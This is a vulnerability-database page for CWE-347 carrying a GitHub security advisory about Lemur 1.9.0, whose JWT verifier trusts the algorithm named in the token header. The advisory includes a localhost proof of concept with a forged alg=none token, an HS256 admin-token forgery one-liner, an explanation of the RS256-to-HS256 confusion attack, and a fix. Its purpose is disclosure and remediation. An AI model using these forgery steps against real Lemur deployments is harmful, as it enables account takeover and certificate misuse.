Common Weakness Enumeration

CWE-347

Allowed

Improper Verification of Cryptographic Signature

Abstraction: Base · Status: Draft

The product does not verify, or incorrectly verifies, the cryptographic signature for data.

1121 vulnerabilities reference this CWE, most recent first.

GHSA-R9GP-7F88-9R54

Vulnerability from github – Published: 2026-06-25 22:05 – Updated: 2026-06-25 22:05
VLAI
Summary
Lemur: JWT verifier honors attacker-supplied alg, enabling ATO
Details

Lemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header — defense-in-depth gap; chain-dependent ATO with secret disclosure

Vulnerability Summary

Field Value
Title Lemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header — defense-in-depth gap; chain-dependent ATO with secret disclosure
Component lemur/lemur/auth/service.py:130-137
CWE CWE-347 (Improper Verification of Cryptographic Signature)
Attack Prerequisite Defense-in-depth gap on its own — no single-request exploit against PyJWT 2.x. Single-request ATO requires a separate disclosure issue that leaks LEMUR_TOKEN_SECRET, or a future migration to asymmetric signing without fixing this sink.
Affected Versions github.com/Netflix/lemur version = "1.9.0". Same code present in every prior release that has the auth/service.py:130 block.

Executive Summary

The Lemur JWT verifier reads the alg header field from the unverified token and passes it straight into pyjwt.decode(..., algorithms=[header['alg']]). This is a classic JWT antipattern: the server is supposed to pin the algorithm, not the attacker. PyJWT 2.x's default config rejects alg=none, so this is not a single-request ATO today — I want to be precise about that. The bug is a hardening gap with two real consequences. First, if the deployment ever migrates to asymmetric signing (RS256/ES256), an attacker can pin alg=HS256 and forge tokens using the public key as the HMAC secret — the legacy "RS256→HS256 confusion" trick. Second, the audit-log surface that records alg to flag anomalous tokens is filled in from the attacker's header, so anomaly detection is blinded. I'm submitting this honestly at MEDIUM 4.8 (defense-in-depth) rather than inflating it; the chain to single-request ATO is documented but it depends on a separate disclosure bug.

Walkthrough: https://asciinema.org/a/2Blv9r4DoOleUk7a


Description

lemur/lemur/auth/service.py:130-137:

try:
    header_data = fetch_token_header(token)
    payload = decode_with_multiple_secrets(
        token, token_secrets, algorithms=[header_data["alg"]]
    )
except jwt.DecodeError:
    return dict(message="Token is invalid"), 403

fetch_token_header decodes the JWT's first segment (base64-decoded JSON, no signature check) and returns the header object. header_data["alg"] is whatever the bearer of the token put there. That value is then handed to decode_with_multiple_secrets, which calls pyjwt.decode(..., algorithms=[<attacker_value>]). The algorithms parameter is meant to be the server's pinned allowlist of acceptable signing algorithms — the line that says "I will accept HS256 and nothing else". By reading it from the token, Lemur asks the attacker which algorithm to trust.

Why this is MEDIUM and not CRITICAL today: PyJWT 2.x's decode() rejects alg=none regardless of the algorithms parameter (PyJWT enforces this in jwt.algorithms.NoneAlgorithm.verify). I confirmed this in the lab — a forged alg=none token comes back as HTTP 403 {"error":"When alg = \"none\", key value must be None.","message":"Failed to decode token"}. The classic single-request alg=none ATO is closed by the library, not by Lemur.

Why this still matters:

  1. Algorithm confusion is exactly what algorithms= is supposed to prevent. The widely-cited "RS256→HS256 confusion" attack works by pinning alg=HS256 and using the RS256 public key as the HMAC secret. The fix everyone teaches for that attack is "server pins the algorithm". Lemur doesn't, so the protection has a hole the moment the deployment moves to asymmetric signing.
  2. The PyJWT 2.x mitigation is a library default, not a Lemur design choice. A future PyJWT major that loosens the none check, or a downgrade to a vulnerable PyJWT for any reason, re-opens single-request ATO. Defense-in-depth means not relying on library defaults to backstop the framework's own validation.
  3. Audit blindness. Logging tooling that consumes alg to detect "this token claims an algorithm we don't issue" sees only what the attacker put in the header. A real HS256 token forged by an attacker who pins alg=ES256 (or any garbage that survives decode) bypasses naive alg-based anomaly heuristics.
  4. The chain to single-request ATO is short. Any separate disclosure issue that leaks LEMUR_TOKEN_SECRET (a debug page, an unguarded /metrics, an SSRF-to-config, an S3 backup leak, a git history accident) immediately turns into HS256 forgery — and the alg-from-header sink leaves the verifier downgradeable even after an operator migrates to RS256 later.

I'm framing this as a hardening defect at MEDIUM 4.8 because that's what the evidence supports. The chain step (config disclosure → forge admin) is demonstrated in the lab as a clear "what happens if this chain links" walk-through, not as a primary claim.

Proof of Concept & Steps to Reproduce

Walkthrough: https://asciinema.org/a/2Blv9r4DoOleUk7a. Offline cast: lemur_jwt_alg_hardening.cast. Harness: lemur_jwt_alg_hardening/support/ (lemur_jwt_mock.py mirrors lemur/auth/service.py:130-137 line-for-line).

Prerequisites: Docker, curl, jq, python3 with PyJWT.

Run

cd lemur_jwt_alg_hardening/
EXPLOIT_FAST=1 ./exploit_code.sh

Step 1 — Baseline legitimate login

curl -sS -X POST http://127.0.0.1:18001/api/1/auth/login \
  -H 'Content-Type: application/json' \
  -d '{"email":"operator@netflix.example"}'

Response (evidence/03_login_response.json):

{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9....",
 "user":{"active":true,"email":"operator@netflix.example","id":1,"role":"operator"}}

/api/1/users/me with that token returns 200 — baseline auth path works.

Step 2 — Confirm the antipattern in source

docker exec lemur-jwt-alg-hardening-harness cat /app/evidence-src/jwt_sink.txt

Output is the verbatim Lemur block:

# lemur/lemur/auth/service.py:130-137
try:
    header_data = fetch_token_header(token)
    payload = decode_with_multiple_secrets(
        token, token_secrets, algorithms=[header_data["alg"]]   # <-- antipattern
    )
except jwt.DecodeError:
    return dict(message="Token is invalid"), 403

The mock applies the same code path. No transformation, no allowlist, no server pin.

Step 3 — Forge alg=none (PyJWT 2.x rejects)

curl -sS -o /dev/null -w 'HTTP %{http_code}
' \
  http://127.0.0.1:18001/api/1/users/me \
  -H 'Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJzdWIiOiAyLCAiZW1haWwiOiAiYWRtaW5AbmV0ZmxpeC5leGFtcGxlIn0.'

Response (evidence/05_alg_none_attempt.json): HTTP 403. Body: {"error":"When alg = \"none\", key value must be None.","message":"Failed to decode token"}.

This is honest: PyJWT 2.x closes the single-request alg=none path. The antipattern is not directly exploitable at this PyJWT version.

Step 4 — Chain demo: config disclosure → HS256 forgery

The lab simulates an upstream disclosure issue by docker exec-ing into the container and reading /app/lemur.conf.py. In production this corresponds to any of: a /metrics page that echoes config, a debug error that prints current_app.config, an SSRF that reaches file:///app/lemur.conf.py, a misindexed git history, an S3 backup with the config file. The lab does not invent a separate vulnerability — it documents what happens when one of those exists.

docker exec lemur-jwt-alg-hardening-harness cat /app/lemur.conf.py
# LEMUR_TOKEN_SECRET = 'lab-deploy-token-secret-DO-NOT-USE-IN-PROD-aabbccdd11'

Forge an admin JWT with the leaked secret:

python3 -c "import jwt; print(jwt.encode({'sub':2,'email':'admin@netflix.example'}, '<leaked>', algorithm='HS256'))"
# eyJhbGciOiJIUzI1NiIs...

Send it:

curl -sS http://127.0.0.1:18001/api/1/users/me \
  -H "Authorization: Bearer $FORGED_ADMIN"

Response (evidence/06_forged_admin_response.json):

{"payload":{"email":"admin@netflix.example","sub":2},
 "user":{"active":true,"email":"admin@netflix.example","id":2,"role":"admin"}}

HTTP 200, role=admin. The forgery succeeds because (a) the attacker picked alg=HS256, (b) the server didn't pin its own algorithm, and (c) the secret was disclosed by the separate upstream issue. If the alg-from-header sink were fixed, even a leaked HS256 secret would not extend to whatever asymmetric algorithm the operator migrates to next — the attacker would have to also break the asymmetric key.

Step 5 — Verdict

VERDICT: ANTIPATTERN CONFIRMED — chain-dependent ATO
1. lemur/auth/service.py:130-137 passes attacker-controlled alg into decode()
2. PyJWT 2.x rejects alg=none, so the antipattern is NOT directly exploitable
3. Chained with upstream config disclosure → HS256 forgery wins
# Exploit Code & Lab Set-up [Lemur-jwt-alg-hardening.zip](https://github.com/user-attachments/files/28317909/Lemur-jwt-alg-hardening.zip)

Root Cause Analysis

The pattern in auth/service.py:130-137 is what every JWT-library author warns against. pyjwt.decode's algorithms parameter exists precisely to pin the server's accepted set; the documentation calls out that callers should never pass the value from the token header. The author of this block likely intended to support multiple deployment configurations (some on HS256, some on RS256) and dispatched on the token's claimed algorithm — but the right way to do that is algorithms=current_app.config["JWT_ACCEPTED_ALGS"] (a server-pinned list), not algorithms=[header_data["alg"]] (the attacker's preference).

The PyJWT 2.x mitigation is the only thing standing between this code and a single-request alg=none ATO. That mitigation lives in PyJWT's NoneAlgorithm.verify, which raises InvalidKeyError when alg=none is supplied with a non-None key. Lemur passes a real key, so the path raises and Lemur catches it as jwt.DecodeError and returns 403. Good — but the protection is in the dependency, not in Lemur's code. A PyJWT-1.x backport, an accidental downgrade, or a future PyJWT behaviour change re-opens the door.

The RS256→HS256 confusion variant is the more durable concern. If an operator migrates Lemur from HS256 to RS256 — a normal hardening step — the attacker pins alg=HS256 in the header and uses the RS256 public key as the HMAC secret. PyJWT 2.x's decode_complete does call _verify_signature with the supplied algorithm, and if the algorithm is HS256 and the "secret" is the bytes of the RS256 public key, the verifier passes. The fix is a server-pinned algorithm list; if the server only accepts ["RS256"], an attacker-supplied alg=HS256 token fails at the algorithms check before any key material is consulted.

The MEDIUM 4.8 score honestly reflects what's exploitable today: the antipattern is real, the impact today is limited to (a) audit-log blinding and (b) a downgrade primitive that activates under separate conditions. I'm explicitly not claiming RS256→HS256 against current Lemur because Lemur today is HS256 — the "RS256 → HS256" trick doesn't apply because Lemur's secret arg is HMAC bytes, not an RSA pubkey. The fix is still worth making.

Attack Scenario

sequenceDiagram
    participant Attacker
    participant Lemur as Lemur API
    participant Disclosure as Disclosure surface
    participant Audit as Audit logging

    Note over Attacker,Lemur: "Today: PyJWT 2.x mitigation holds for alg=none"
    Attacker->>Lemur: "Bearer alg=none token with [payload]"
    Lemur->>Lemur: "pyjwt.decode raises (alg=none + non-None key)"
    Lemur-->>Attacker: "403 Forbidden"

    Note over Disclosure,Lemur: "Chain step: separate disclosure leaks LEMUR_TOKEN_SECRET"
    Attacker->>Disclosure: "trigger debug / SSRF / backup leak"
    Disclosure-->>Attacker: "LEMUR_TOKEN_SECRET value"

    Note over Attacker,Lemur: "Forge HS256 admin token with leaked secret"
    Attacker->>Lemur: "Bearer alg=HS256 admin token signed with leaked secret"
    Lemur->>Lemur: "algorithms=[HS256] (taken from header) — accepted"
    Lemur-->>Attacker: "200 OK, role=admin"

    Note over Audit: "alg=HS256 in audit log - no anomaly flag because attacker picks alg"

Impact Assessment

Today, in a fully-patched Lemur 1.9.0 on PyJWT 2.x, the standalone impact is C:L (audit-log surface is attacker-influenced) / I:L (an attacker who controls alg can downgrade a future verifier upgrade) / A:N. The vector requires no user interaction — the attacker just sends a crafted token directly — but AC:H reflects the real-world conditions that have to align (PyJWT version, future migration to asymmetric signing, or a separate disclosure issue) before standalone impact materializes. That's the 4.8 MEDIUM score. The chain step to single-request ATO depends on a separate disclosure issue, which I'm not claiming as part of this report.

The reason this is worth fixing now rather than later is that it's a one-line change with no behavioural risk, and the consequence of leaving it in place is a permanent downgrade vector against any algorithm migration Netflix later decides to do. Lemur's role in the certificate-signing pipeline makes its session tokens unusually high-value — anyone who forges a Lemur admin JWT can issue, revoke, and exfiltrate certificates across the org. The Lemur PKI compromise report submitted separately (ACME acme_url SSRF + creator IDOR) shows what an admin Lemur identity can do in practice.

If Lemur ever moves to asymmetric signing without fixing this sink, the score moves to CRITICAL on the same day. Fix it now.

Remediation

One-line server pin:

# lemur/lemur/auth/service.py:130-137
allowed_algs = current_app.config.get("JWT_ALGORITHMS", ["HS256"])
try:
    payload = decode_with_multiple_secrets(
        token, token_secrets, algorithms=allowed_algs
    )
except jwt.DecodeError:
    return dict(message="Token is invalid"), 403

Three follow-ups worth doing at the same time:

  1. Log the algorithm the server actually applied, separately from the algorithm in the token header. This lets audit tooling see "the server enforced HS256 and the token claimed HS256" or, post-fix, "the server enforced RS256 and the token claimed HS256 — rejected", and flag mismatches.
  2. Pin algorithms to the smallest possible set. If Lemur only ever issues HS256, accept only HS256. Don't list every supported algorithm just because the library supports it.
  3. Migrate to asymmetric signing in a separate hardening PR once the algorithm pin is in. RS256 with key rotation removes the "leaked secret = forge admin" chain entirely.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "lemur"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55165"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-25T22:05:17Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "\u003c!-- obsidian --\u003e\u003ch1 data-heading=\"Lemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header \u2014 defense-in-depth gap; chain-dependent ATO with secret disclosure\"\u003eLemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header \u2014 defense-in-depth gap; chain-dependent ATO with secret disclosure\u003c/h1\u003e\n\u003ch2 data-heading=\"Vulnerability Summary\"\u003eVulnerability Summary\u003c/h2\u003e\n\nField | Value\n-- | --\nTitle | Lemur 1.9.0: JWT verifier trusts attacker-supplied alg from token header \u2014 defense-in-depth gap; chain-dependent ATO with secret disclosure\nComponent | lemur/lemur/auth/service.py:130-137\nCWE | CWE-347 (Improper Verification of Cryptographic Signature)\nAttack Prerequisite | Defense-in-depth gap on its own \u2014 no single-request exploit against PyJWT 2.x. Single-request ATO requires a separate disclosure issue that leaks LEMUR_TOKEN_SECRET, or a future migration to asymmetric signing without fixing this sink.\nAffected Versions | github.com/Netflix/lemur __version__ = \"1.9.0\". Same code present in every prior release that has the auth/service.py:130 block.\n\n\n\u003ch2 data-heading=\"Executive Summary\"\u003eExecutive Summary\u003c/h2\u003e\n\u003cp\u003eThe Lemur JWT verifier reads the \u003ccode\u003ealg\u003c/code\u003e header field from the \u003cem\u003eunverified\u003c/em\u003e token and passes it straight into \u003ccode\u003epyjwt.decode(..., algorithms=[header[\u0027alg\u0027]])\u003c/code\u003e. This is a classic JWT antipattern: the server is supposed to pin the algorithm, not the attacker. PyJWT 2.x\u0027s default config rejects \u003ccode\u003ealg=none\u003c/code\u003e, so this is not a single-request ATO today \u2014 I want to be precise about that. The bug is a hardening gap with two real consequences. First, if the deployment ever migrates to asymmetric signing (RS256/ES256), an attacker can pin \u003ccode\u003ealg=HS256\u003c/code\u003e and forge tokens using the public key as the HMAC secret \u2014 the legacy \"RS256\u2192HS256 confusion\" trick. Second, the audit-log surface that records \u003ccode\u003ealg\u003c/code\u003e to flag anomalous tokens is filled in from the attacker\u0027s header, so anomaly detection is blinded. I\u0027m submitting this honestly at MEDIUM 4.8 (defense-in-depth) rather than inflating it; the chain to single-request ATO is documented but it depends on a separate disclosure bug.\u003c/p\u003e\n\u003cp\u003eWalkthrough: \u003ca href=\"https://asciinema.org/a/2Blv9r4DoOleUk7a\" class=\"external-link\" target=\"_blank\" rel=\"noopener nofollow\"\u003ehttps://asciinema.org/a/2Blv9r4DoOleUk7a\u003c/a\u003e\u003cbr\u003e\n\u003chr\u003e\n\u003ch2 data-heading=\"Description\"\u003eDescription\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003elemur/lemur/auth/service.py:130-137\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-python\"\u003etry:\n    header_data = fetch_token_header(token)\n    payload = decode_with_multiple_secrets(\n        token, token_secrets, algorithms=[header_data[\"alg\"]]\n    )\nexcept jwt.DecodeError:\n    return dict(message=\"Token is invalid\"), 403\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003ccode\u003efetch_token_header\u003c/code\u003e decodes the JWT\u0027s first segment (base64-decoded JSON, no signature check) and returns the header object. \u003ccode\u003eheader_data[\"alg\"]\u003c/code\u003e is whatever the bearer of the token put there. That value is then handed to \u003ccode\u003edecode_with_multiple_secrets\u003c/code\u003e, which calls \u003ccode\u003epyjwt.decode(..., algorithms=[\u0026#x3C;attacker_value\u003e])\u003c/code\u003e. The \u003ccode\u003ealgorithms\u003c/code\u003e parameter is meant to be the server\u0027s pinned allowlist of acceptable signing algorithms \u2014 the line that says \"I will accept HS256 and nothing else\". By reading it from the token, Lemur asks the attacker which algorithm to trust.\u003c/p\u003e\n\u003cp\u003eWhy this is MEDIUM and not CRITICAL today: PyJWT 2.x\u0027s \u003ccode\u003edecode()\u003c/code\u003e rejects \u003ccode\u003ealg=none\u003c/code\u003e regardless of the \u003ccode\u003ealgorithms\u003c/code\u003e parameter (PyJWT enforces this in \u003ccode\u003ejwt.algorithms.NoneAlgorithm.verify\u003c/code\u003e). I confirmed this in the lab \u2014 a forged \u003ccode\u003ealg=none\u003c/code\u003e token comes back as \u003ccode\u003eHTTP 403 {\"error\":\"When alg = \\\"none\\\", key value must be None.\",\"message\":\"Failed to decode token\"}\u003c/code\u003e. The classic single-request \u003ccode\u003ealg=none\u003c/code\u003e ATO is closed by the library, not by Lemur.\u003c/p\u003e\n\u003cp\u003eWhy this still matters:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eAlgorithm confusion is exactly what \u003ccode\u003ealgorithms=\u003c/code\u003e is supposed to prevent.\u003c/strong\u003e The widely-cited \"RS256\u2192HS256 confusion\" attack works by pinning \u003ccode\u003ealg=HS256\u003c/code\u003e and using the RS256 public key as the HMAC secret. The fix everyone teaches for that attack is \"server pins the algorithm\". Lemur doesn\u0027t, so the protection has a hole the moment the deployment moves to asymmetric signing.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe PyJWT 2.x mitigation is a library default, not a Lemur design choice.\u003c/strong\u003e A future PyJWT major that loosens the \u003ccode\u003enone\u003c/code\u003e check, or a downgrade to a vulnerable PyJWT for any reason, re-opens single-request ATO. Defense-in-depth means not relying on library defaults to backstop the framework\u0027s own validation.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAudit blindness.\u003c/strong\u003e Logging tooling that consumes \u003ccode\u003ealg\u003c/code\u003e to detect \"this token claims an algorithm we don\u0027t issue\" sees only what the attacker put in the header. A real \u003ccode\u003eHS256\u003c/code\u003e token forged by an attacker who pins \u003ccode\u003ealg=ES256\u003c/code\u003e (or any garbage that survives \u003ccode\u003edecode\u003c/code\u003e) bypasses naive alg-based anomaly heuristics.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eThe chain to single-request ATO is short.\u003c/strong\u003e Any separate disclosure issue that leaks \u003ccode\u003eLEMUR_TOKEN_SECRET\u003c/code\u003e (a debug page, an unguarded \u003ccode\u003e/metrics\u003c/code\u003e, an SSRF-to-config, an S3 backup leak, a git history accident) immediately turns into HS256 forgery \u2014 and the alg-from-header sink leaves the verifier downgradeable even after an operator migrates to RS256 later.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eI\u0027m framing this as a hardening defect at MEDIUM 4.8 because that\u0027s what the evidence supports. The chain step (config disclosure \u2192 forge admin) is demonstrated in the lab as a clear \"what happens if this chain links\" walk-through, not as a primary claim.\u003c/p\u003e\n\u003ch2 data-heading=\"Proof of Concept \u0026#x26; Steps to Reproduce\"\u003eProof of Concept \u0026#x26; Steps to Reproduce\u003c/h2\u003e\n\u003cp\u003eWalkthrough: \u003ca href=\"https://asciinema.org/a/2Blv9r4DoOleUk7a\" class=\"external-link\" target=\"_blank\" rel=\"noopener nofollow\"\u003ehttps://asciinema.org/a/2Blv9r4DoOleUk7a\u003c/a\u003e. Offline cast: \u003ccode\u003elemur_jwt_alg_hardening.cast\u003c/code\u003e. Harness: \u003ccode\u003elemur_jwt_alg_hardening/support/\u003c/code\u003e (\u003ccode\u003elemur_jwt_mock.py\u003c/code\u003e mirrors \u003ccode\u003elemur/auth/service.py:130-137\u003c/code\u003e line-for-line).\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003ePrerequisites\u003c/strong\u003e: Docker, \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ejq\u003c/code\u003e, \u003ccode\u003epython3\u003c/code\u003e with PyJWT.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eRun\u003c/strong\u003e\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecd lemur_jwt_alg_hardening/\nEXPLOIT_FAST=1 ./exploit_code.sh\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3 data-heading=\"Step 1 \u2014 Baseline legitimate login\"\u003eStep 1 \u2014 Baseline legitimate login\u003c/h3\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -sS -X POST http://127.0.0.1:18001/api/1/auth/login \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"email\":\"operator@netflix.example\"}\u0027\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eResponse (\u003ccode\u003eevidence/03_login_response.json\u003c/code\u003e):\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-json\"\u003e{\"token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9....\",\n \"user\":{\"active\":true,\"email\":\"operator@netflix.example\",\"id\":1,\"role\":\"operator\"}}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003ccode\u003e/api/1/users/me\u003c/code\u003e with that token returns 200 \u2014 baseline auth path works.\u003c/p\u003e\n\u003ch3 data-heading=\"Step 2 \u2014 Confirm the antipattern in source\"\u003eStep 2 \u2014 Confirm the antipattern in source\u003c/h3\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003edocker exec lemur-jwt-alg-hardening-harness cat /app/evidence-src/jwt_sink.txt\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eOutput is the verbatim Lemur block:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-python\"\u003e# lemur/lemur/auth/service.py:130-137\ntry:\n    header_data = fetch_token_header(token)\n    payload = decode_with_multiple_secrets(\n        token, token_secrets, algorithms=[header_data[\"alg\"]]   # \u0026#x3C;-- antipattern\n    )\nexcept jwt.DecodeError:\n    return dict(message=\"Token is invalid\"), 403\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThe mock applies the same code path. No transformation, no allowlist, no server pin.\u003c/p\u003e\n\u003ch3 data-heading=\"Step 3 \u2014 Forge \u0026#x60;alg=none\u0026#x60; (PyJWT 2.x rejects)\"\u003eStep 3 \u2014 Forge \u003ccode\u003ealg=none\u003c/code\u003e (PyJWT 2.x rejects)\u003c/h3\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -sS -o /dev/null -w \u0027HTTP %{http_code}\n\u0027 \\\n  http://127.0.0.1:18001/api/1/users/me \\\n  -H \u0027Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJzdWIiOiAyLCAiZW1haWwiOiAiYWRtaW5AbmV0ZmxpeC5leGFtcGxlIn0.\u0027\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eResponse (\u003ccode\u003eevidence/05_alg_none_attempt.json\u003c/code\u003e): \u003ccode\u003eHTTP 403\u003c/code\u003e. Body: \u003ccode\u003e{\"error\":\"When alg = \\\"none\\\", key value must be None.\",\"message\":\"Failed to decode token\"}\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThis is honest: PyJWT 2.x closes the single-request \u003ccode\u003ealg=none\u003c/code\u003e path. The antipattern is not directly exploitable at this PyJWT version.\u003c/p\u003e\n\u003ch3 data-heading=\"Step 4 \u2014 Chain demo: config disclosure \u2192 HS256 forgery\"\u003eStep 4 \u2014 Chain demo: config disclosure \u2192 HS256 forgery\u003c/h3\u003e\n\u003cp\u003eThe lab simulates an upstream disclosure issue by \u003ccode\u003edocker exec\u003c/code\u003e-ing into the container and reading \u003ccode\u003e/app/lemur.conf.py\u003c/code\u003e. In production this corresponds to any of: a \u003ccode\u003e/metrics\u003c/code\u003e page that echoes config, a debug error that prints \u003ccode\u003ecurrent_app.config\u003c/code\u003e, an SSRF that reaches \u003ccode\u003efile:///app/lemur.conf.py\u003c/code\u003e, a misindexed git history, an S3 backup with the config file. The lab does not invent a separate vulnerability \u2014 it documents what happens \u003cem\u003ewhen one of those exists\u003c/em\u003e.\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003edocker exec lemur-jwt-alg-hardening-harness cat /app/lemur.conf.py\n# LEMUR_TOKEN_SECRET = \u0027lab-deploy-token-secret-DO-NOT-USE-IN-PROD-aabbccdd11\u0027\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eForge an admin JWT with the leaked secret:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003epython3 -c \"import jwt; print(jwt.encode({\u0027sub\u0027:2,\u0027email\u0027:\u0027admin@netflix.example\u0027}, \u0027\u0026#x3C;leaked\u003e\u0027, algorithm=\u0027HS256\u0027))\"\n# eyJhbGciOiJIUzI1NiIs...\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eSend it:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003ecurl -sS http://127.0.0.1:18001/api/1/users/me \\\n  -H \"Authorization: Bearer $FORGED_ADMIN\"\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eResponse (\u003ccode\u003eevidence/06_forged_admin_response.json\u003c/code\u003e):\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-json\"\u003e{\"payload\":{\"email\":\"admin@netflix.example\",\"sub\":2},\n \"user\":{\"active\":true,\"email\":\"admin@netflix.example\",\"id\":2,\"role\":\"admin\"}}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eHTTP 200, \u003ccode\u003erole=admin\u003c/code\u003e. The forgery succeeds because (a) the attacker picked \u003ccode\u003ealg=HS256\u003c/code\u003e, (b) the server didn\u0027t pin its own algorithm, and (c) the secret was disclosed by the separate upstream issue. If the alg-from-header sink were fixed, even a leaked HS256 secret would not extend to whatever asymmetric algorithm the operator migrates to next \u2014 the attacker would have to also break the asymmetric key.\u003c/p\u003e\n\u003ch3 data-heading=\"Step 5 \u2014 Verdict\"\u003eStep 5 \u2014 Verdict\u003c/h3\u003e\n\u003cpre\u003e\u003ccode\u003eVERDICT: ANTIPATTERN CONFIRMED \u2014 chain-dependent ATO\n1. lemur/auth/service.py:130-137 passes attacker-controlled alg into decode()\n2. PyJWT 2.x rejects alg=none, so the antipattern is NOT directly exploitable\n3. Chained with upstream config disclosure \u2192 HS256 forgery wins\n\u003c/code\u003e\u003c/pre\u003e\n\n# Exploit Code \u0026 Lab Set-up\n\n[Lemur-jwt-alg-hardening.zip](https://github.com/user-attachments/files/28317909/Lemur-jwt-alg-hardening.zip)\n\n\n\u003ch2 data-heading=\"Root Cause Analysis\"\u003eRoot Cause Analysis\u003c/h2\u003e\n\u003cp\u003eThe pattern in \u003ccode\u003eauth/service.py:130-137\u003c/code\u003e is what every JWT-library author warns against. \u003ccode\u003epyjwt.decode\u003c/code\u003e\u0027s \u003ccode\u003ealgorithms\u003c/code\u003e parameter exists precisely to pin the server\u0027s accepted set; the documentation calls out that callers should never pass the value from the token header. The author of this block likely intended to support multiple deployment configurations (some on HS256, some on RS256) and dispatched on the token\u0027s claimed algorithm \u2014 but the right way to do that is \u003ccode\u003ealgorithms=current_app.config[\"JWT_ACCEPTED_ALGS\"]\u003c/code\u003e (a server-pinned list), not \u003ccode\u003ealgorithms=[header_data[\"alg\"]]\u003c/code\u003e (the attacker\u0027s preference).\u003c/p\u003e\n\u003cp\u003eThe PyJWT 2.x mitigation is the only thing standing between this code and a single-request \u003ccode\u003ealg=none\u003c/code\u003e ATO. That mitigation lives in PyJWT\u0027s \u003ccode\u003eNoneAlgorithm.verify\u003c/code\u003e, which raises \u003ccode\u003eInvalidKeyError\u003c/code\u003e when \u003ccode\u003ealg=none\u003c/code\u003e is supplied with a non-None key. Lemur passes a real key, so the path raises and Lemur catches it as \u003ccode\u003ejwt.DecodeError\u003c/code\u003e and returns 403. Good \u2014 but the protection is in the dependency, not in Lemur\u0027s code. A PyJWT-1.x backport, an accidental downgrade, or a future PyJWT behaviour change re-opens the door.\u003c/p\u003e\n\u003cp\u003eThe RS256\u2192HS256 confusion variant is the more durable concern. If an operator migrates Lemur from HS256 to RS256 \u2014 a normal hardening step \u2014 the attacker pins \u003ccode\u003ealg=HS256\u003c/code\u003e in the header and uses the RS256 \u003cem\u003epublic key\u003c/em\u003e as the HMAC secret. PyJWT 2.x\u0027s \u003ccode\u003edecode_complete\u003c/code\u003e does call \u003ccode\u003e_verify_signature\u003c/code\u003e with the supplied algorithm, and if the algorithm is HS256 and the \"secret\" is the bytes of the RS256 public key, the verifier passes. The fix is a server-pinned algorithm list; if the server only accepts \u003ccode\u003e[\"RS256\"]\u003c/code\u003e, an attacker-supplied \u003ccode\u003ealg=HS256\u003c/code\u003e token fails at the \u003ccode\u003ealgorithms\u003c/code\u003e check before any key material is consulted.\u003c/p\u003e\n\u003cp\u003eThe MEDIUM 4.8 score honestly reflects what\u0027s exploitable today: the antipattern is real, the impact today is limited to (a) audit-log blinding and (b) a downgrade primitive that activates under separate conditions. I\u0027m explicitly not claiming RS256\u2192HS256 against current Lemur because Lemur today is HS256 \u2014 the \"RS256 \u2192 HS256\" trick doesn\u0027t apply because Lemur\u0027s secret arg is HMAC bytes, not an RSA pubkey. The fix is still worth making.\u003c/p\u003e\n\n\u003ch2 data-heading=\"Attack Scenario\"\u003eAttack Scenario\u003c/h2\u003e\n\n```mermaid\nsequenceDiagram\n    participant Attacker\n    participant Lemur as Lemur API\n    participant Disclosure as Disclosure surface\n    participant Audit as Audit logging\n\n    Note over Attacker,Lemur: \"Today: PyJWT 2.x mitigation holds for alg=none\"\n    Attacker-\u003e\u003eLemur: \"Bearer alg=none token with [payload]\"\n    Lemur-\u003e\u003eLemur: \"pyjwt.decode raises (alg=none + non-None key)\"\n    